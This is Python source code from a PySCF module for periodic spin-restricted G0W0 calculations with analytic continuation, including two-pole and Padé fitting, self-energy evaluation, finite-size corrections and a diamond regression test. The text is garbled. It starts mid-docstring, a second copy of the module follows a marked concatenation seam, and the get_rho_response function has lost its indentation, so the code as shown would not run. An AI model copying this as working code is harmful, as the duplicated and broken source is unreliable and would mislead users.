    """Residual of the two-pole model against sigma, as a flat real vector.

    coeff packs 5 complex coefficients as [5 real parts, 5 imag parts].
    The first frequency point's residual is scaled by 1/0.01 (100x weight).
    """
    cf = coeff[:5] + 1j * coeff[5:]
    model = cf[0] + cf[1] / (omega + cf[3]) + cf[2] / (omega + cf[4])
    resid = model - sigma
    resid[0] = resid[0] / 0.01
    return np.concatenate([resid.real, resid.imag])
def two_pole(freqs, coeff):
    """Evaluate the two-pole model at freqs from packed real coefficients."""
    cf = coeff[:5] + 1j * coeff[5:]
    pole1 = cf[1] / (freqs + cf[3])
    pole2 = cf[2] / (freqs + cf[4])
    return cf[0] + pole1 + pole2
def AC_twopole_diag(sigma, omega, orbs, nocc):
    """
    Analytic continuation to real axis using a two-pole model.

    Args:
        sigma : (norbs, nw) complex self-energy on the imaginary axis.
        omega : (norbs, nw) imaginary-frequency grid per orbital.
        orbs : orbital indices corresponding to the rows of sigma.
        nocc : number of occupied orbitals (selects the initial guess).

    Returns:
        coeff: 2D array (ncoeff, norbs); 5 complex two-pole parameters
        per orbital packed as [5 real parts, 5 imag parts].
    """
    norbs, nw = sigma.shape
    coeff = np.zeros((10, norbs))
    for p in range(norbs):
        # mirrored initial pole positions for occupied vs virtual orbitals
        if orbs[p] < nocc:
            x0 = np.array([0, 1, 1, 1, -1, 0, 0, 0, -1.0, -0.5])
        else:
            x0 = np.array([0, 1, 1, 1, -1, 0, 0, 0, 1.0, 0.5])
        #TODO: analytic gradient
        xopt = least_squares(two_pole_fit, x0, jac='3-point', method='trf', xtol=1e-10,
                             gtol=1e-10, max_nfev=1000, verbose=0, args=(omega[p], sigma[p]))
        # 'not success' instead of 'is False': robust to non-bool flags
        if not xopt.success:
            print('WARN: 2P-Fit Orb %d not converged, cost function %e'%(p, xopt.cost))
        coeff[:, p] = xopt.x.copy()
    return coeff
def thiele(fn, zn):
    """Thiele reciprocal-difference coefficients for a Pade continued fraction.

    Builds the triangular table of reciprocal differences of the samples
    fn at points zn and returns its diagonal (the CF coefficients).
    """
    npts = len(zn)
    table = np.zeros((npts, npts), dtype=np.complex128)
    table[:, 0] = fn.copy()
    for col in range(1, npts):
        prev = table[col:, col - 1]
        table[col:, col] = (table[col - 1, col - 1] - prev) / ((zn[col:] - zn[col - 1]) * prev)
    return table.diagonal()
def pade_thiele(freqs, zn, coeff):
    """Evaluate the Thiele continued fraction with coefficients coeff
    (from thiele()) at freqs, using reference points zn."""
    ncoef = len(coeff)
    # seed with the innermost term, then fold the fraction outwards
    acc = coeff[-1] * (freqs - zn[-2])
    for level in range(ncoef - 1, 0, -1):
        acc = coeff[level] * (freqs - zn[level - 1]) / (1. + acc)
    return coeff[0] / (1. + acc)
def AC_pade_thiele_diag(sigma, omega):
    """
    Analytic continuation to real axis using a Pade approximation
    from Thiele's reciprocal difference method.
    Reference: Vidberg and Serene, J. Low Temp. Phys. 29, 179 (1977)
    Returns:
        coeff: 2D array (ncoeff, norbs)
        omega: 2D array (norbs, npade)
    """
    # subsample the imaginary-frequency grid: dense at low freq, sparse tail
    picked = range(1, 40, 6)
    tail_start = picked[-1] + 4
    sigma = np.hstack((sigma[:, picked], sigma[:, tail_start::4]))
    omega = np.hstack((omega[:, picked], omega[:, tail_start::4]))
    norbs, nfreq = sigma.shape
    npade = nfreq // 2
    coeff = np.zeros((npade * 2, norbs), dtype=np.complex128)
    for p in range(norbs):
        coeff[:, p] = thiele(sigma[p, :npade * 2], omega[p, :npade * 2])
    return coeff, omega[:, :npade * 2]
class KRGWAC(lib.StreamObject):
    """PBC spin-restricted G0W0-AC with k-point sampling.

    Computes GW quasiparticle energies by evaluating the self-energy on
    the imaginary axis and analytically continuing to real frequency.
    """

    # use the perturbative linearized QP equation instead of solving the
    # QP equation self-consistently with Newton iterations
    linearized = getattr(__config__, 'gw_gw_GW_linearized', False)
    # Analytic continuation: pade or twopole
    ac = getattr(__config__, 'gw_gw_GW_ac', 'pade')
    # Whether applying finite size corrections
    fc = getattr(__config__, 'gw_gw_GW_fc', True)

    def __init__(self, mf, frozen=0):
        self.mol = mf.mol
        self._scf = mf
        self.verbose = self.mol.verbose
        self.stdout = self.mol.stdout
        self.max_memory = mf.max_memory
        #TODO: implement frozen orbs
        if frozen > 0:
            raise NotImplementedError
        self.frozen = frozen
        # DF-KGW must use GDF integrals
        if getattr(mf, 'with_df', None):
            self.with_df = mf.with_df
        else:
            raise NotImplementedError
        # NOTE(review): assumes lib.StreamObject provides a class-level
        # _keys here; self._keys is only (re)assigned below -- verify
        self._keys.update(['with_df'])

        ##################################################
        # don't modify the following attributes, they are not input options
        self._nocc = None
        self._nmo = None
        self.kpts = mf.kpts
        self.nkpts = len(self.kpts)
        # self.mo_energy: GW quasiparticle energy, not scf mo_energy
        self.mo_energy = None
        self.mo_coeff = mf.mo_coeff
        self.mo_occ = mf.mo_occ
        self.sigma = None
        keys = set(('linearized', 'ac', 'fc'))
        self._keys = set(self.__dict__.keys()).union(keys)

    def dump_flags(self):
        # Log a summary of the GW settings (sizes, AC method, corrections).
        log = logger.Logger(self.stdout, self.verbose)
        log.info('')
        log.info('******** %s ********', self.__class__)
        log.info('method = %s', self.__class__.__name__)
        nocc = self.nocc
        nvir = self.nmo - nocc
        nkpts = self.nkpts
        log.info('GW nocc = %d, nvir = %d, nkpts = %d', nocc, nvir, nkpts)
        if self.frozen is not None:
            log.info('frozen orbitals %s', str(self.frozen))
        logger.info(self, 'use perturbative linearized QP eqn = %s', self.linearized)
        logger.info(self, 'analytic continuation method = %s', self.ac)
        logger.info(self, 'GW finite size corrections = %s', self.fc)
        return self

    @property
    def nocc(self):
        # number of occupied orbitals (delegates to the kmp2 helper)
        return self.get_nocc()
    @nocc.setter
    def nocc(self, n):
        self._nocc = n

    @property
    def nmo(self):
        # total number of molecular orbitals (delegates to the kmp2 helper)
        return self.get_nmo()
    @nmo.setter
    def nmo(self, n):
        self._nmo = n

    get_nocc = get_nocc
    get_nmo = get_nmo
    get_frozen_mask = get_frozen_mask

    def kernel(self, mo_energy=None, mo_coeff=None, orbs=None, kptlist=None, nw=100):
        """
        Input:
            kptlist: self-energy k-points
            orbs: self-energy orbs
            nw: grid number
        Output:
            mo_energy: GW quasiparticle energy
        """
        if mo_coeff is None:
            mo_coeff = np.array(self._scf.mo_coeff)
        if mo_energy is None:
            mo_energy = np.array(self._scf.mo_energy)

        nmo = self.nmo
        naux = self.with_df.get_naoaux()
        nkpts = self.nkpts
        # rough incore estimate for the complex DF MO integrals, in MB
        mem_incore = (2*nkpts*nmo**2*naux) * 16/1e6
        mem_now = lib.current_memory()[0]
        if (mem_incore + mem_now > 0.99*self.max_memory):
            logger.warn(self, 'Memory may not be enough!')
            raise NotImplementedError

        # time.clock() was removed in Python 3.8; process_time() is the
        # supported equivalent (CPU time)
        cput0 = (time.process_time(), time.time())
        self.dump_flags()
        self.converged, self.mo_energy, self.mo_coeff = \
                kernel(self, mo_energy, mo_coeff, orbs=orbs,
                       kptlist=kptlist, nw=nw, verbose=self.verbose)

        logger.warn(self, 'GW QP energies may not be sorted from min to max')
        logger.timer(self, 'GW', *cput0)
        return self.mo_energy
if __name__ == '__main__':
    # Regression test: G0W0@PBE quasiparticle energies of diamond on a
    # 3x1x1 k-mesh, with and without finite-size corrections.
    from pyscf.pbc import gto, dft, scf
    from pyscf.pbc.lib import chkfile
    import os
    # This test takes a few minutes
    cell = gto.Cell()
    cell.build(unit = 'angstrom',
               a = '''
               0.000000 1.783500 1.783500
               1.783500 0.000000 1.783500
               1.783500 1.783500 0.000000
               ''',
               atom = 'C 1.337625 1.337625 1.337625; C 2.229375 2.229375 2.229375',
               dimension = 3,
               max_memory = 8000,
               verbose = 4,
               pseudo = 'gth-pade',
               basis='gth-szv',
               precision=1e-10)

    kpts = cell.make_kpts([3,1,1],scaled_center=[0,0,0])
    gdf = df.GDF(cell, kpts)
    gdf_fname = 'gdf_ints_311.h5'
    gdf._cderi_to_save = gdf_fname
    # reuse cached GDF integrals if present on disk
    if not os.path.isfile(gdf_fname):
        gdf.build()

    chkfname = 'diamond_311.chk'
    if os.path.isfile(chkfname):
        # restore a converged SCF from the checkpoint file
        kmf = dft.KRKS(cell, kpts)
        kmf.xc = 'pbe'
        kmf.with_df = gdf
        kmf.with_df._cderi = gdf_fname
        data = chkfile.load(chkfname, 'scf')
        kmf.__dict__.update(data)
    else:
        kmf = dft.KRKS(cell, kpts)
        kmf.xc = 'pbe'
        kmf.with_df = gdf
        kmf.with_df._cderi = gdf_fname
        kmf.conv_tol = 1e-12
        kmf.chkfile = chkfname
        kmf.kernel()

    gw = KRGWAC(kmf)
    gw.linearized = False
    gw.ac = 'pade'
    # without finite size corrections
    gw.fc = False
    nocc = gw.nocc
    gw.kernel(kptlist=[0,1,2],orbs=range(0,nocc+3))
    print(gw.mo_energy)
    # reference QP energies (Hartree) at the band edges of k0 and k1
    assert((abs(gw.mo_energy[0][nocc-1]-0.62045797))<1e-5)
    assert((abs(gw.mo_energy[0][nocc]-0.96574324))<1e-5)
    assert((abs(gw.mo_energy[1][nocc-1]-0.52639137))<1e-5)
    assert((abs(gw.mo_energy[1][nocc]-1.07513258))<1e-5)

    # with finite size corrections
    gw.fc = True
    gw.kernel(kptlist=[0,1,2],orbs=range(0,nocc+3))
    print(gw.mo_energy)
    assert((abs(gw.mo_energy[0][nocc-1]-0.54277092))<1e-5)
    assert((abs(gw.mo_energy[0][nocc]-0.80148537))<1e-5)
    assert((abs(gw.mo_energy[1][nocc-1]-0.45073793))<1e-5)
    assert((abs(gw.mo_energy[1][nocc]-0.92910108))<1e-5)
# ==== concatenation artifact: a second copy of this module follows ====
#!/usr/bin/env python
# Copyright 2014-2020 The PySCF Developers. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Author: <NAME> <<EMAIL>>
#
'''
PBC spin-restricted G0W0-AC QP eigenvalues with k-point sampling
This implementation has N^4 scaling, and is faster than GW-CD (N^4)
and analytic GW (N^6) methods.
GW-AC is recommended for valence states only, and is inaccurate for core states.
Method:
See T. Zhu and G. K.-L. Chan, arXiv:2007.03148 (2020) for details
Compute Sigma on imaginary frequency with density fitting,
then analytically continued to real frequency.
Gaussian density fitting must be used (FFTDF and MDF are not supported).
'''
from functools import reduce
import time
import numpy
import numpy as np
import h5py
from scipy.optimize import newton, least_squares
from pyscf import lib
from pyscf.lib import logger
from pyscf.ao2mo import _ao2mo
from pyscf.ao2mo.incore import _conc_mos
from pyscf.pbc import df, dft, scf
from pyscf.pbc.mp.kmp2 import get_nocc, get_nmo, get_frozen_mask
from pyscf import __config__
einsum = lib.einsum
def kernel(gw, mo_energy, mo_coeff, orbs=None,
           kptlist=None, nw=None, verbose=logger.NOTE):
    '''GW-corrected quasiparticle orbital energies.

    Args:
        gw : KRGWAC object.
        mo_energy : SCF orbital energies.
        mo_coeff : SCF orbital coefficients.
        orbs : orbitals for which the self-energy is computed
            (default: all orbitals).
        kptlist : k-point indices (default: all k-points).
        nw : number of imaginary-frequency quadrature points.
        verbose : log level.

    Returns:
        A list : converged, mo_energy, mo_coeff
    '''
    mf = gw._scf
    # frozen orbitals are not implemented; only frozen == 0 is accepted
    if gw.frozen is None:
        frozen = 0
    else:
        frozen = gw.frozen
    assert (frozen == 0)

    if orbs is None:
        orbs = range(gw.nmo)
    if kptlist is None:
        kptlist = range(gw.nkpts)
    nkpts = gw.nkpts
    nklist = len(kptlist)
    norbs = len(orbs)

    # v_xc: mean-field potential minus Coulomb, rotated into the MO basis
    dm = np.array(mf.make_rdm1())
    v_mf = np.array(mf.get_veff()) - np.array(mf.get_j(dm_kpts=dm))
    for k in range(nkpts):
        v_mf[k] = reduce(numpy.dot, (mo_coeff[k].T.conj(), v_mf[k], mo_coeff[k]))

    nocc = gw.nocc
    nmo = gw.nmo
    nvir = nmo-nocc  # NOTE(review): unused

    # v_hf from DFT/HF density (exact-exchange matrix in the MO basis)
    if gw.fc:
        exxdiv = 'ewald'
    else:
        exxdiv = None
    rhf = scf.KRHF(gw.mol, gw.kpts, exxdiv=exxdiv)
    rhf.with_df = gw.with_df
    if getattr(gw.with_df, '_cderi', None) is None:
        raise RuntimeError('Found incompatible integral scheme %s.'
                           'KGWAC can be only used with GDF integrals' %
                           gw.with_df.__class__)
    vk = rhf.get_veff(gw.mol,dm_kpts=dm) - rhf.get_j(gw.mol,dm_kpts=dm)
    for k in range(nkpts):
        vk[k] = reduce(numpy.dot, (mo_coeff[k].T.conj(), vk[k], mo_coeff[k]))

    # Grids for integration on imaginary axis
    freqs,wts = _get_scaled_legendre_roots(nw)

    # Compute self-energy on imaginary axis i*[0,iw_cutoff]
    sigmaI, omega = get_sigma_diag(gw, orbs, kptlist, freqs, wts, iw_cutoff=5.)

    # Analytic continuation
    coeff = []
    if gw.ac == 'twopole':
        for k in range(nklist):
            coeff.append(AC_twopole_diag(sigmaI[k], omega, orbs, nocc))
    elif gw.ac == 'pade':
        for k in range(nklist):
            coeff_tmp, omega_fit = AC_pade_thiele_diag(sigmaI[k], omega)
            coeff.append(coeff_tmp)
    # NOTE(review): omega_fit keeps the value from the last kptlist
    # iteration; OK only if the Pade grid is k-independent -- verify
    coeff = np.array(coeff)

    conv = True
    # This code does not support metals: HOMO/LUMO over all k-points
    homo = -99.; lumo = 99.
    for k in range(nkpts):
        if homo < mf.mo_energy[k][nocc-1]:
            homo = mf.mo_energy[k][nocc-1]
        if lumo > mf.mo_energy[k][nocc]:
            lumo = mf.mo_energy[k][nocc]
    # Fermi level placed mid-gap
    ef = (homo+lumo)/2.

    mo_energy = np.zeros_like(np.array(mf.mo_energy))
    for k in range(nklist):
        kn = kptlist[k]
        for p in orbs:
            if gw.linearized:
                # linearized G0W0: first-order Taylor expansion of sigma,
                # derivative taken by finite difference with step de
                de = 1e-6
                ep = mf.mo_energy[kn][p]
                #TODO: analytic sigma derivative
                if gw.ac == 'twopole':
                    sigmaR = two_pole(ep-ef, coeff[k,:,p-orbs[0]]).real
                    dsigma = two_pole(ep-ef+de, coeff[k,:,p-orbs[0]]).real - sigmaR.real
                elif gw.ac == 'pade':
                    sigmaR = pade_thiele(ep-ef, omega_fit[p-orbs[0]], coeff[k,:,p-orbs[0]]).real
                    dsigma = pade_thiele(ep-ef+de, omega_fit[p-orbs[0]], coeff[k,:,p-orbs[0]]).real - sigmaR.real
                # quasiparticle renormalization factor Z
                zn = 1.0/(1.0-dsigma/de)
                e = ep + zn*(sigmaR.real + vk[kn,p,p].real - v_mf[kn,p,p].real)
                mo_energy[kn,p] = e
            else:
                # self-consistently solve QP equation
                # (closure over k/p is safe: called immediately by newton
                # before the loop variables advance)
                def quasiparticle(omega):
                    if gw.ac == 'twopole':
                        sigmaR = two_pole(omega-ef, coeff[k,:,p-orbs[0]]).real
                    elif gw.ac == 'pade':
                        sigmaR = pade_thiele(omega-ef, omega_fit[p-orbs[0]], coeff[k,:,p-orbs[0]]).real
                    return omega - mf.mo_energy[kn][p] - (sigmaR.real + vk[kn,p,p].real - v_mf[kn,p,p].real)
                try:
                    e = newton(quasiparticle, mf.mo_energy[kn][p], tol=1e-6, maxiter=100)
                    mo_energy[kn,p] = e
                except RuntimeError:
                    # Newton iteration failed to converge for this orbital
                    conv = False
    mo_coeff = mf.mo_coeff

    if gw.verbose >= logger.DEBUG:
        numpy.set_printoptions(threshold=nmo)
        for k in range(nkpts):
            logger.debug(gw, ' GW mo_energy @ k%d =\n%s', k,mo_energy[k])
        numpy.set_printoptions(threshold=1000)

    return conv, mo_energy, mo_coeff
def get_rho_response(gw, omega, mo_energy, Lpq, kL, kidx):
'''
Compute density response function in auxiliary basis at freq iw
'''
nkpts, naux, nmo, nmo = Lpq.shape
nocc = gw.nocc
kpts = gw.kpts
kscaled = gw.mol.get_scaled_kpts(kpts)
kscaled -= kscaled[0]
# Compute Pi for kL
Pi = np.zeros((naux,naux),dtype=np.complex128)
for i, kpti in enumerate(kpts):
# Find ka that conserves with ki and kL (-ki+ka+kL=G)
a = kidx[i]
eia = mo_energy[i,:nocc,None] - mo_energy[a,None,nocc:]
eia = eia/(omega**2+eia*eia)
Pia = einsum('Pia,ia->Pia',Lpq[i][:,:nocc,nocc:],eia)
# Response from both spin-up and spin-down density
Pi += 4./nkpts * einsum('Pia,Qia->PQ',Pia,Lpq[i][:,:nocc,nocc:].conj())
return Pi
def get_sigma_diag(gw, orbs, kptlist, freqs, wts, iw_cutoff=None, max_memory=8000):
    '''
    Compute GW correlation self-energy (diagonal elements)
    in MO basis on imaginary axis.

    Args:
        gw : KRGWAC object.
        orbs : orbital indices for which the self-energy is evaluated.
            NOTE(review): the occ/vir row split below (norbs_occ) assumes
            orbs lists its occupied entries first -- verify with callers.
        kptlist : k-point indices for the self-energy.
        freqs, wts : imaginary-frequency quadrature nodes and weights.
        iw_cutoff : keep only frequency points below this cutoff (plus w=0).
        max_memory : unused in this routine; kept for interface compatibility
            (gw._scf.max_memory is used for the DF read below).

    Returns:
        sigma : (nklist, norbs, nw_sigma) complex array Sigma_pp(i*omega).
        omega : (norbs, nw_sigma) per-orbital frequency grid
            (occupied: -i*w, virtual: +i*w).
    '''
    mo_energy = np.array(gw._scf.mo_energy)
    mo_coeff = np.array(gw._scf.mo_coeff)
    nocc = gw.nocc
    nmo = gw.nmo
    nkpts = gw.nkpts
    kpts = gw.kpts
    nklist = len(kptlist)
    nw = len(freqs)
    norbs = len(orbs)
    mydf = gw.with_df

    # possible kpts shift center
    kscaled = gw.mol.get_scaled_kpts(kpts)
    kscaled -= kscaled[0]

    # This code does not support metals: locate HOMO/LUMO over all k-points
    homo = -99.; lumo = 99.
    for k in range(nkpts):
        if homo < mo_energy[k][nocc-1]:
            homo = mo_energy[k][nocc-1]
        if lumo > mo_energy[k][nocc]:
            lumo = mo_energy[k][nocc]
    if (lumo-homo) < 1e-3:
        logger.warn(gw, 'This GW-AC code is not supporting metals!')
    # Fermi level placed mid-gap
    ef = (homo+lumo)/2.

    # Integration on numerical grids
    if iw_cutoff is not None:
        nw_sigma = sum(iw < iw_cutoff for iw in freqs) + 1
    else:
        nw_sigma = nw + 1

    # Compute occ for -iw and vir for iw separately
    # to avoid branch cuts in analytic continuation
    omega_occ = np.zeros((nw_sigma), dtype=np.complex128)
    omega_vir = np.zeros((nw_sigma), dtype=np.complex128)
    omega_occ[0] = 1j*0.; omega_occ[1:] = -1j*freqs[:(nw_sigma-1)]
    omega_vir[0] = 1j*0.; omega_vir[1:] = 1j*freqs[:(nw_sigma-1)]
    orbs_occ = [i for i in orbs if i < nocc]
    norbs_occ = len(orbs_occ)

    # emo_* = omega + ef - e_p, the denominators of G0 on the two branches
    emo_occ = np.zeros((nkpts, nmo, nw_sigma), dtype=np.complex128)
    emo_vir = np.zeros((nkpts, nmo, nw_sigma), dtype=np.complex128)
    for k in range(nkpts):
        emo_occ[k] = omega_occ[None, :] + ef - mo_energy[k][:, None]
        emo_vir[k] = omega_vir[None, :] + ef - mo_energy[k][:, None]

    sigma = np.zeros((nklist, norbs, nw_sigma), dtype=np.complex128)
    omega = np.zeros((norbs, nw_sigma), dtype=np.complex128)
    for p in range(norbs):
        orbp = orbs[p]
        if orbp < nocc:
            omega[p] = omega_occ.copy()
        else:
            omega[p] = omega_vir.copy()

    if gw.fc:
        # Set up q mesh for q->0 finite size correction
        q_pts = np.array([1e-3, 0, 0]).reshape(1, 3)
        nq_pts = len(q_pts)  # NOTE(review): unused
        q_abs = gw.mol.get_abs_kpts(q_pts)
        # Get qij = 1/sqrt(Omega) * < psi_{ik} | e^{iqr} | psi_{ak-q} > at q: (nkpts, nocc, nvir)
        qij = get_qij(gw, q_abs[0], mo_coeff)

    for kL in range(nkpts):
        # Lij: (ki, L, i, j) for looping every kL
        Lij = []
        # kidx: save kj that conserves with kL and ki (-ki+kj+kL=G)
        # kidx_r: save ki that conserves with kL and kj (-ki+kj+kL=G)
        kidx = np.zeros((nkpts), dtype=np.int64)
        kidx_r = np.zeros((nkpts), dtype=np.int64)
        for i, kpti in enumerate(kpts):
            for j, kptj in enumerate(kpts):
                # Find (ki,kj) that satisfies momentum conservation with kL
                kconserv = -kscaled[i] + kscaled[j] + kscaled[kL]
                is_kconserv = np.linalg.norm(np.round(kconserv) - kconserv) < 1e-12
                if is_kconserv:
                    kidx[i] = j
                    kidx_r[j] = i
                    logger.debug(gw, "Read Lpq (kL: %s / %s, ki: %s, kj: %s)"%(kL+1, nkpts, i, j))
                    Lij_out = None
                    # Read (L|pq) and ao2mo transform to (L|ij)
                    Lpq = []
                    for LpqR, LpqI, sign in mydf.sr_loop([kpti, kptj], max_memory=0.1*gw._scf.max_memory, compact=False):
                        Lpq.append(LpqR+LpqI*1.0j)
                    # support uneqaul naux on different k points
                    Lpq = np.vstack(Lpq).reshape(-1, nmo**2)
                    tao = []
                    ao_loc = None
                    moij, ijslice = _conc_mos(mo_coeff[i], mo_coeff[j])[2:]
                    Lij_out = _ao2mo.r_e2(Lpq, moij, ijslice, tao, ao_loc, out=Lij_out)
                    Lij.append(Lij_out.reshape(-1, nmo, nmo))
        Lij = np.asarray(Lij)
        naux = Lij.shape[1]

        if kL == 0:
            # kL = Gamma: optionally add head/wing finite-size corrections
            for w in range(nw):
                # body dielectric matrix eps_body
                Pi = get_rho_response(gw, freqs[w], mo_energy, Lij, kL, kidx)
                eps_body_inv = np.linalg.inv(np.eye(naux)-Pi)

                if gw.fc:
                    # head dielectric matrix eps_00
                    Pi_00 = get_rho_response_head(gw, freqs[w], mo_energy, qij)
                    eps_00 = 1. - 4. * np.pi/np.linalg.norm(q_abs[0])**2 * Pi_00

                    # wings dielectric matrix eps_P0
                    Pi_P0 = get_rho_response_wing(gw, freqs[w], mo_energy, Lij, qij)
                    eps_P0 = -np.sqrt(4.*np.pi) / np.linalg.norm(q_abs[0]) * Pi_P0

                    # inverse dielectric matrix (block inversion: head/wing/body)
                    eps_inv_00 = 1./(eps_00 - np.dot(np.dot(eps_P0.conj(), eps_body_inv), eps_P0))
                    eps_inv_P0 = -eps_inv_00 * np.dot(eps_body_inv, eps_P0)

                    # head correction
                    Del_00 = 2./np.pi * (6.*np.pi**2/gw.mol.vol/nkpts)**(1./3.) * (eps_inv_00 - 1.)

                eps_inv_PQ = eps_body_inv
                # quadrature-weighted G0 factors on the two frequency branches
                g0_occ = wts[w] * emo_occ / (emo_occ**2+freqs[w]**2)
                g0_vir = wts[w] * emo_vir / (emo_vir**2+freqs[w]**2)
                for k in range(nklist):
                    kn = kptlist[k]
                    # Find km that conserves with kn and kL (-km+kn+kL=G)
                    km = kidx_r[kn]
                    Qmn = einsum('Pmn,PQ->Qmn', Lij[km][:, :, orbs].conj(), eps_inv_PQ-np.eye(naux))
                    Wmn = 1./nkpts * einsum('Qmn,Qmn->mn', Qmn, Lij[km][:, :, orbs])
                    sigma[k][:norbs_occ] += -einsum('mn,mw->nw', Wmn[:, :norbs_occ], g0_occ[km])/np.pi
                    sigma[k][norbs_occ:] += -einsum('mn,mw->nw', Wmn[:, norbs_occ:], g0_vir[km])/np.pi

                    if gw.fc:
                        # apply head correction
                        assert(kn == km)
                        sigma[k][:norbs_occ] += -Del_00 * g0_occ[kn][orbs][:norbs_occ] /np.pi
                        sigma[k][norbs_occ:] += -Del_00 * g0_vir[kn][orbs][norbs_occ:] /np.pi

                        # apply wing correction
                        Wn_P0 = einsum('Pnm,P->nm', Lij[kn], eps_inv_P0).diagonal()
                        Wn_P0 = Wn_P0.real * 2.
                        Del_P0 = np.sqrt(gw.mol.vol/4./np.pi**3) * (6.*np.pi**2/gw.mol.vol/nkpts)**(2./3.) * Wn_P0[orbs]
                        sigma[k][:norbs_occ] += -einsum('n,nw->nw', Del_P0[:norbs_occ], g0_occ[kn][orbs][:norbs_occ]) /np.pi
                        sigma[k][norbs_occ:] += -einsum('n,nw->nw', Del_P0[norbs_occ:], g0_vir[kn][orbs][norbs_occ:]) /np.pi
        else:
            # kL != Gamma: plain body contribution only
            for w in range(nw):
                Pi = get_rho_response(gw, freqs[w], mo_energy, Lij, kL, kidx)
                Pi_inv = np.linalg.inv(np.eye(naux)-Pi)-np.eye(naux)
                g0_occ = wts[w] * emo_occ / (emo_occ**2+freqs[w]**2)
                g0_vir = wts[w] * emo_vir / (emo_vir**2+freqs[w]**2)
                for k in range(nklist):
                    kn = kptlist[k]
                    # Find km that conserves with kn and kL (-km+kn+kL=G)
                    km = kidx_r[kn]
                    Qmn = einsum('Pmn,PQ->Qmn', Lij[km][:, :, orbs].conj(), Pi_inv)
                    Wmn = 1./nkpts * einsum('Qmn,Qmn->mn', Qmn, Lij[km][:, :, orbs])
                    sigma[k][:norbs_occ] += -einsum('mn,mw->nw', Wmn[:, :norbs_occ], g0_occ[km])/np.pi
                    sigma[k][norbs_occ:] += -einsum('mn,mw->nw', Wmn[:, norbs_occ:], g0_vir[km])/np.pi

    return sigma, omega
def get_rho_response_head(gw, omega, mo_energy, qij):
    '''
    Compute head (G=0, G'=0) density response function in auxiliary basis at freq iw
    '''
    nkpts = qij.shape[0]
    nocc = gw.nocc
    head = 0j
    for ik, _kpt in enumerate(gw.kpts):
        de = mo_energy[ik, :nocc, None] - mo_energy[ik, None, nocc:]
        weight = de / (omega**2 + de * de)
        # factor 4/nkpts: response from both spin channels, k-point averaged
        head += 4. / nkpts * einsum('ia,ia->', weight, qij[ik].conj() * qij[ik])
    return head
def get_rho_response_wing(gw, omega, mo_energy, Lpq, qij):
    '''
    Compute wing (G=P, G'=0) density response function in auxiliary basis at freq iw
    '''
    nkpts = Lpq.shape[0]
    naux = Lpq.shape[1]
    nocc = gw.nocc
    wing = np.zeros(naux, dtype=np.complex128)
    for ik in range(len(gw.kpts)):
        de = mo_energy[ik, :nocc, None] - mo_energy[ik, None, nocc:]
        weight = (de / (omega**2 + de * de)) * qij[ik].conj()
        wing += 4. / nkpts * einsum('Pia,ia->P', Lpq[ik][:, :nocc, nocc:], weight)
    return wing
def get_qij(gw, q, mo_coeff, uniform_grids=False):
    '''
    Compute qij = 1/Omega * |< psi_{ik} | e^{iqr} | psi_{ak-q} >|^2 at q: (nkpts, nocc, nvir)
    through k.p perturbation theory.  Used for the q->0 finite-size
    (head/wing) corrections.
    Ref: Phys. Rev. B 83, 245122 (2011)

    Args:
        gw : GW object (reads nocc, nmo, kpts, mol and _scf.mo_energy).
        q : (3,) absolute q-vector near Gamma.
        mo_coeff : MO coefficients per k-point.
        uniform_grids : integrate on FFT uniform grids instead of Becke grids.

    Returns:
        qij : (nkpts, nocc, nvir) complex array.
    '''
    nocc = gw.nocc
    nmo = gw.nmo
    nvir = nmo - nocc
    kpts = gw.kpts
    nkpts = len(kpts)
    cell = gw.mol
    mo_energy = gw._scf.mo_energy

    if uniform_grids:
        mydf = df.FFTDF(cell, kpts=kpts)
        coords = cell.gen_uniform_grids(mydf.mesh)
    else:
        # Becke atomic grids for the real-space integration
        coords, weights = dft.gen_grid.get_becke_grids(cell, level=5)
    ngrid = len(coords)

    qij = np.zeros((nkpts, nocc, nvir), dtype=np.complex128)
    for i, kpti in enumerate(kpts):
        # AO values and gradients on the grid: ao_p[0] is the AO value,
        # ao_p[1:4] the x,y,z derivatives
        ao_p = dft.numint.eval_ao(cell, coords, kpt=kpti, deriv=1)
        ao = ao_p[0]
        ao_grad = ao_p[1:4]
        if uniform_grids:
            ao_ao_grad = einsum('mg,xgn->xmn', ao.T.conj(), ao_grad) * cell.vol / ngrid
        else:
            ao_ao_grad = einsum('g,mg,xgn->xmn', weights, ao.T.conj(), ao_grad)
        # q . <mu|grad|nu>, then transform to the occ x vir MO block
        q_ao_ao_grad = -1j * einsum('x,xmn->mn', q, ao_ao_grad)
        q_mo_mo_grad = np.dot(np.dot(mo_coeff[i][:, :nocc].T.conj(), q_ao_ao_grad), mo_coeff[i][:, nocc:])
        # k.p energy denominators 1/(e_a - e_i)
        enm = 1./(mo_energy[i][nocc:, None] - mo_energy[i][None, :nocc])
        dens = enm.T * q_mo_mo_grad
        qij[i] = dens / np.sqrt(cell.vol)
    return qij
def _get_scaled_legendre_roots(nw):
    """
    Scale nw Gauss-Legendre roots from [-1, 1] onto [0, inf)
    via the map x -> x0*(1+x)/(1-x).
    Ref: www.cond-mat.de/events/correl19/manuscripts/ren.pdf
    Returns:
        freqs : 1D ndarray
        wts : 1D ndarray
    """
    roots, weights = np.polynomial.legendre.leggauss(nw)
    x0 = 0.5
    scaled_roots = x0 * (1. + roots) / (1. - roots)
    # Jacobian of the map: 2*x0/(1-x)^2
    scaled_wts = weights * 2. * x0 / (1. - roots)**2
    return scaled_roots, scaled_wts
def _get_clenshaw_curtis_roots(nw):
    """
    Clenshaw-Curtis quadrature on [0, inf)
    Ref: J. Chem. Phys. 132, 234114 (2010)
    Returns:
        freqs : 1D ndarray
        wts : 1D ndarray
    """
    a = 0.2
    freqs = np.zeros(nw)
    wts = np.zeros(nw)
    for idx in range(nw):
        t = (idx + 1.0) / nw * np.pi / 2.
        freqs[idx] = a / np.tan(t)
        # the endpoint t = pi/2 carries half the interior weight
        factor = 4. if idx == nw - 1 else 2.
        wts[idx] = a * np.pi / factor / nw / (np.sin(t)**2)
    # return in ascending frequency order
    return freqs[::-1], wts[::-1]
def two_pole_fit(coeff, omega, sigma):
    """Residual of the two-pole model against sigma, as a flat real vector.

    coeff packs 5 complex coefficients as [5 real parts, 5 imag parts].
